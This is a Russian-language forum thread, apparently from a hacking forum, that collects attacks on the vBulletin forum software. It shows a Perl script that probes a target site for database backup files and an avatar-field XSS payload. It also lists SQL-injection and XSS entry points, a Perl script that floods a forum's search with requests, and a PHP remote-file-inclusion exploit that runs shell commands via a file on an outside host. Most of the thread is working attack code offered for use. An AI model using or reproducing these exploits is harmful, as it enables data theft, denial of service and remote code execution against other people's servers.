• XSS.stack #1 – первый литературный журнал от юзеров форума

Уязвимости: vBulletin

Это ерунда, с помощью это штуки никогда воблу не взломать! у меня есть откомпилиный бинарник и код на переле этой штуки

Код:
use IO::Socket;

if (@ARGV < 2)
{
print "\n===========================\n";
print " \n -- Exploit By Alpha Programmer(sirius) --\n\n";
print " Crouz Security Team \n\n";
print " Usage: <Target> <DIR>\n\n";
print "===========================\n\n";
print "Examples:\n\n";
print " VbulletinBU.pl www.shabgard.org /Forums/\n\n";
print "You Can Add The Forum Backup Folder \n(It's Default in Forum's Root Directory) \n Example : VbulletinBU.pl www.shabgard.org /Forums/include/ /Alpha Programmer\n\n";

exit();
}

my $host = $ARGV[0];
my $DIR = $ARGV[1];


@Alpha = ('0' , '1' , '2' , '3' , '4' ,'5' , '6' , '7' , '8' , '9' );

foreach $licht0 ( @Alpha ) {
foreach $licht1 ( @Alpha ) {
foreach $licht2 ( @Alpha ) {
foreach $licht3 ( @Alpha ) {
foreach $licht4 ( @Alpha ) {
$crouz = $licht1.$licht2;
$crouz2 = $licht3.$licht4;
$crouz3 = "200";
$crouz3 .= $licht0;

if ($crouz >= 31 ) {
goto LightDoor;
}

if ($crouz2 > 12 ) {
goto LightDoor;
}

if ($crouz3 > 2005 ) {
goto LightDoor;
}

print "forumbackup-$crouz-$crouz2-$crouz3.sql\n";
$Sirius = "forumbackup-$crouz2-$crouz-$crouz3.sql";

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "80" );

unless ($remote) { die "C4nn0t C0nn3ct to $host" }

$http = "HEAD $DIR$Sirius HTTP/1.0\n";
$http .= "Host: $host\n\r\n\r";
print "\n";
print $remote $http;
sleep(1);

while ($sirus=<$remote>)
{
if($sirus =~ "200 OK") {
print "$sirus";
print "Nice ... You Found The BackUp Of VBulletin Forum , See This URL :\n";
print "$host$DIR$Sirius\n\n";
goto start;
}
}
}
LightDoor:
}
}
}
}

start:

#EoF

Для тех кто в танке эта шняга ищет бекапы базы данных в папках /forum/ / /forum/archive/ /forum/cpadmin/ ! Но это сработает 1 из 10000000 раз, так как врядли кто будет хранить это там. да и вааще кто делает бекапы??

Ps хотя в паблике пока и нету сплойтов и уязвимостей на воблу 3.0.7 и выше. но день назад мне один оочень сомнительный чел предлагал купить за 5 буказойдов експлойты для распростанненых новых форумов, среди которых был и этот! Не знаю, не знаю ,может просто разводом занимаеться!
 
XSS на Vbulletin 3.5.x
Достаточно досадная бага была найдена в наипопулярнейшем двиге.
Значит XSS заключается в том когда редактируешь аватар вставляешь вот такой код
Код:
http://www.(javascript:alert());"[xss code].com/.jpg

в поле где требуется url ссылка.
 
Множественные уязвимости в vBulletin <3.0.9
Описание:
1) SQL-Injection:
/joinrequests.php:
POST: <do=processjoinrequests&usergroupid=22&request[[SQL-Injection]]=0>

/admincp/user.php:
GET: <do=find&orderby=username&limitnumber=[SQL-Injection]>
GET: <do=find&orderby=username&limitstart=[SQL-Injection]>

/admincp/usertitle.php:
GET: <do=edit&usertitleid=0XF>

/admincp/usertools.php:
GET: <do=pmuserstats&ids=0XF>

2) XSS:
/admincp/css.php:
GET: <do=doedit&dostyleid=1&group=[XSS]>

/admincp/index.php:
GET: <redirect=[XSS]>

/admincp/user.php:
GET: <do=emailpassword&email=[XSS]>

/admincp/language.php:
GET: <do=rebuild&goto=[XSS]>

/admincp/modlog.php:
GET: <do=view&orderby=[XSS]>

/admincp/template.php:
GET: <do=colorconverter&hex=[XSS]>
GET: <do=colorconverter&rgb=[XSS]>
GET: <do=modify&expandset=[XSS]

3) Загрузка произвольных файлов
Пользователь с правами администратора и привиллегией загрузки аватарос/иконок/смайлов может загрузить произвольные файлы.

/admincp/image.php:
POST: <do=upload&table=avatar>
POST: <do=upload&table=icon>
POST: <do=upload&table=smilie>


4) Прочее (не пропатчено до сих пор):
/modcp/announcement.php:
POST: <do=update&announcementid=1&start=24-07-05&end=30-07-05
&announcement[0]=[SQL-Injection]>

/modcp/user.php:
GET: <do=avatar&userid=0XF>

/admincp/admincalendar.php:
POST: <do=update&calendarid=1&calendar[daterange]=1970-2030&
calendar[0]=[SQL-Injection]>
POST: <do=updatemod&moderatorid=1&moderator[calendarid]=0XF>

/admincp/cronlog.php:
POST: <do=doprunelog&cronid=0XF>
POST: <do=prunelog&cronid=0XF>

/admincp/email.php:
POST: <do=makelist&user[usergroupid][0]=[SQL-Injection]>

/admincp/help.php:
POST: <do=doedit&help[script]=1&help[0]=[SQL-Injection]>

/admincp/language.php:
POST: <do=update&rvt[0]=[SQL-Injection]>

/admincp/phrase.php:
POST: <do=completeorphans&keep[0]=[SQL-Injection]>

/admincp/usertools.php:
POST: <do=updateprofilepic>

XSS:
/admincp/announcement.php
/admincp/admincalendar.php
/admincp/bbcode.php
/admincp/cronadmin.php
/admincp/email.php?do=genlist
/admincp/faq.php?do=add
/admincp/forum.php?do=add
/admincp/image.php?do=add&table=avatar/icon/smilie
/admincp/language.php
/admincp/ranks.php?do=add
/admincp/replacement.php?do=add
/admincp/replacement.php?do=edit
/admincp/template.php?do=addstyle
/admincp/template.php?do=edit
/admincp/usergroup.php?do=add
/admincp/usertitle.php
 
Вот еще 1 сплойт:

vBulletin <=3.5.3 DoS

Эксплойт флудит форум поисковыыми запросами:
перл.

Код:
#!/usr/bin/perl 
########################################## 
# vBdos.pl - vBulletin <=3.5.3 Search DoS 
# 
# Written by spic of g00ns 
########################################## 
# Contact 
# Site: www.g00ns.net and www.g00ns-forum.net 
# Email: spic <at> g00ns.net 
# IRC: irc.g00ns.net #g00ns 
########################################## 
# Example 
# vBdos.pl www.avbforum.com /vbulletin/ 
########################################## 
# Partially ripped from zod32 of g00ns! 
# Sorry, zod! :( 
# Excuse the messy code :] 
########################################## 
# Shoutz to 
# 
# z3r0, ArYa, uid0, zod32, kutmaster, 
# felosi, cijfer, wr0ck, 
# and the rest of the crew!;) 
########################################## 

use IO::Socket; 
$server= $ARGV[0]; 
$path=$ARGV[1]; 


while($x != 9999) 
{ 
$post = "search_keywords=spic+of+g00ns+owned+your+site$x+&search_terms=any&search_author=
&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=
ASC&show_results=posts&return_chars=200"; 
# Выравниваем 3 вышеидущие строки в 1


$lrg = length $post; 


if(!$server||!$path) 
{ 
print "rn"; 
print "vBulletin DoS by spic of g00nsn"; 
print "usage: vBdos.pl <host without http> <directory>rn"; 
exit(); 
} 



my $sock = new IO::Socket::INET ( 
PeerAddr => "$server", 
PeerPort => "80", 
Proto => "tcp", 
); 
die "nThe Socket Can't Connect To The Desired Host or the Host is MayBe DoSed: $!n" unless $sock; 


print $sock "POST $path"."search.php?searchid=1952 HTTP/1.1n"; 
print $sock "Host: $servern"; 
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5n"; 
print $sock "Referer: $servern"; 
print $sock "Accept-Language: en-usn"; 
print $sock "Content-Type: application/x-www-form-urlencodedn"; 
print $sock "Accept-Encoding: gzip, deflaten"; 
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.5n"; 
print $sock "Connection: Keep-Aliven"; 
print $sock "Cache-Control: no-cachen"; 
print $sock "Content-Length: $lrgnn"; 
print $sock "$postn"; 
close($sock); 


syswrite STDOUT,"."; 

$x++; 
}
 
PHP-инклюдинг в модуле ImpEx в vBulletin
Программа: ImpEx 1.74 (модуль для vBulletin)
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "systempath" в сценарии ImpExData.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Эксплоит:
Код:
<?php
/*
vbulletin ImpEx Remote File Inclusion Exploit c0ded by ReZEN
Sh0uts: xorcrew.net, ajax, gml, #subterrain, My gf
url:  http://www.xorcrew.net/ReZEN

example:
turl: http://www.target.com/impex/ImpExData.php?systempath=
hurl:http://www.pwn3d.com/evil.txt?

*/

$cmd = $_POST["cmd"];
$turl = $_POST["turl"];
$hurl = $_POST["hurl"];

$form= "<form method=\"post\" action=\"".$PHP_SELF."\">"
     ."turl:
<input type=\"text\" name=\"turl\" size=\"90\" 
value=\"".$turl."\">
"
     ."hurl:
<input type=\"text\" name=\"hurl\" size=\"90\" 
value=\"".$hurl."\">
"
     ."cmd:
<input type=\"text\" name=\"cmd\" size=\"90\" 
value=\"".$cmd."\">
"
     ."<input type=\"submit\" value=\"Submit\" name=\"submit\">"

     ."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";

if (!isset($_POST['submit']))
{

echo $form;

}else{

$file = fopen ("test.txt", "w+");

fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\");
system(\"echo ++END++\"); ?>");
fclose($file);

$file = fopen ($turl.$hurl, "r");
if (!$file) {
     echo "<p>Unable to get output.\n";
     exit;
}

echo $form;

while (!feof ($file)) {
     $line .= fgets ($file, 1024)."
";
     }
$tpos1 = strpos($line, "++BEGIN++");
$tpos2 = strpos($line, "++END++");
$tpos1 = $tpos1+strlen("++BEGIN++");
$tpos2 = $tpos2-$tpos1;
$output = substr($line, $tpos1, $tpos2);
echo $output;

}
?>
 
Папку инстал там физически не оставиш. Не удалив ее в админку не попадеш.
 
Папку инстал там физически не оставиш. Не удалив ее в админку не попадеш.
Вот только админы часто просто её переименовывают в install_ или типа того...а баг вобще просто банальный
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх